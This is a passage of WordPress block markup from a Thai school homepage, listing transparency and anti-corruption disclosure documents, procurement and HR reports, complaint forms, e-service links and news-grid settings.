style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 